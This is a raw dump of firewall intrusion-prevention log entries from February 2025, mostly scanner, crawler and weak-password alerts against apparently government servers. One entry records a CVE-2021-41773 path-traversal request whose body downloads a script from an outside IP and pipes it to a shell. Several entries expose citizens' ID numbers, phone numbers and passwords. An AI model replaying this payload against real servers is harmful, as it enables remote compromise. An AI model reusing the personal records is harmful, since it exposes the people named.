,{"LogType":"1","ID":"1766","UserID":"1310722","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58106,\"DestPort\":9000,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:38:55\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"172.169.190.151\",\"User\":\"172.169.190.151\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:9000\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1769474","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":53278,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:14:00\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.7\",\"User\":\"111.225.148.7\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" zyx.datong12380.gov.cn\",\"HttpFirstLine\":\"\/robots.txt\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1376258","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":45824,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:38:17\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 13:40:09\\\",\\\"acceptPersonName\\\":\\\"\\\\e5\\\\bc\\\\a0\\\\e7\\\\a7\\\\80\\\\e7\\\\8e\\\\b2\\\",\\\"applyDate\\\":\\\"2025-02-26 13:40:02\\\",\\\"applyIdNo\\\":\\\"14022620001112794X\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"15235239806\\\",\\\"applyName\\\":\\\"\\\\e6\\\\9d\\\\8e\\\\e6\\\\85\\\\a7\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2025-02-26 16:40:09\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140213MB196264XP400012301400001\\\",\\\"itemName\\\":\\\"\\\\e6\\\\8a\\\\a4\\\\e5\\\\a3\\\\ab\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e9\\\\a6\\\\96\\\\e6\\\\ac\\\\a1\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"840855\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000012\\\",\\\"title\\\":\\\"\\\\e6\\\\8a\\\\a4\\\\e5\\\\a3\\\\ab\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e9\\\\a6\\\\96\\\\e6\\\\ac\\\\a1\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\"},\\\"stepIns\\\":[{\\\"descr\\\":\\\"\\\\e5\\\\90\\\\8c\\\\e6\\\\84\\\\8f\\\",\\\"endDate\\\":\\\"2025-02-26 13:40:16\\\",\\\"limitDays\\\":1,\\\"limitStat\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1835010","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49288,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:12:21\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 14:14:21\\\",\\\"acceptPersonName\\\":\\\"\\\\e4\\\\b9\\\\94\\\\e6\\\\99\\\\93\\\\e8\\\\8a\\\\b1\\\",\\\"applyDate\\\":\\\"2025-02-26 14:14:15\\\",\\\"applyIdNo\\\":\\\"140203610502431\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13935209411\\\",\\\"applyName\\\":\\\"\\\\e6\\\\88\\\\90\\\\e9\\\\92\\\\a6\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2025-02-26 16:14:21\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140200MB19366520314012300500002\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\8f\\\\98\\\\e6\\\\9b\\\\b4\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"552187\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000008\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\8f\\\\98\\\\e6\\\\9b\\\\b4\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\89\\\"},\\\"stepIns\\\":[{\\\"descr\\\":\\\"\\\\e5\\\\90\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1441794","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":35918,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:37:01\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 13:39:01\\\",\\\"acceptPersonName\\\":\\\"\\\\e4\\\\b9\\\\94\\\\e6\\\\99\\\\93\\\\e8\\\\8a\\\\b1\\\",\\\"applyDate\\\":\\\"2025-02-26 13:38:54\\\",\\\"applyIdNo\\\":\\\"140202621214309\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13015391758\\\",\\\"applyName\\\":\\\"\\\\e6\\\\a2\\\\81\\\\e5\\\\bb\\\\ba\\\\e5\\\\b9\\\\b3\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2024-04-29 16:39:01\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140200MB19366520314012300500003\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"306640\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000011\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\"},\\\"\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
]
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1507330","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":45680,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:33:25\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 15:35:25\\\",\\\"acceptPersonName\\\":\\\"\\\\e5\\\\bc\\\\a0\\\\e7\\\\a7\\\\80\\\\e7\\\\8e\\\\b2\\\",\\\"applyDate\\\":\\\"2025-02-26 15:35:18\\\",\\\"applyIdNo\\\":\\\"140211198603214428\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13546072988\\\",\\\"applyName\\\":\\\"\\\\e9\\\\9f\\\\a9\\\\e7\\\\8e\\\\89\\\\e5\\\\a8\\\\9f\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2023-09-11 16:35:25\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140213MB196264XP400012301200003\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"747501\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000009\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\"\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密 码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1572866","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":60256,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:15:34\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.194\",\"User\":\"111.225.148.194\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/view\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1638402","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":57098,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:15:33\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.194\",\"User\":\"111.225.148.194\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/article_list.htm?itemId=139&parentId=0\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1703938","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41308,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":44259,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"CVE-2021-41773_Apache_HTTP_Server·径遍历漏洞\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:14:36\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"43.143.211.222\",\"User\":\"43.143.211.222\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2021-41773\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79:80\",\"HttpFirstLine\":\"\/cgi-bin\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/bin\/sh\",\"Payload\":\"POST \/cgi-bin\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/bin\/sh HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.79:80\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aUpgrade-Insecure-Requests: 1\\\\0d\\\\0aUser-Agent: Custom-AsyncHttpClient\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0aContent-Type: text\/plain\\\\0d\\\\0aContent-Length: 105\\\\0d\\\\0a\\\\0d\\\\0aX=$(curl http:\/\/196.251.88.141\/sh || wget http:\/\/196.251.88.141\/sh -O-); echo \\\"$X\\\" | sh -s apache.selfrep\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"DirectoryTraversal\",\"MethodSubNameCN\":\"目录遍历\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1769474","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":53278,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:14:00\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.7\",\"User\":\"111.225.148.7\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" zyx.datong12380.gov.cn\",\"HttpFirstLine\":\"\/robots.txt\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
|
||||||
,{"LogType":"1","ID":"1766","UserID":"1835010","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49288,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:12:21\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 14:14:21\\\",\\\"acceptPersonName\\\":\\\"\\\\e4\\\\b9\\\\94\\\\e6\\\\99\\\\93\\\\e8\\\\8a\\\\b1\\\",\\\"applyDate\\\":\\\"2025-02-26 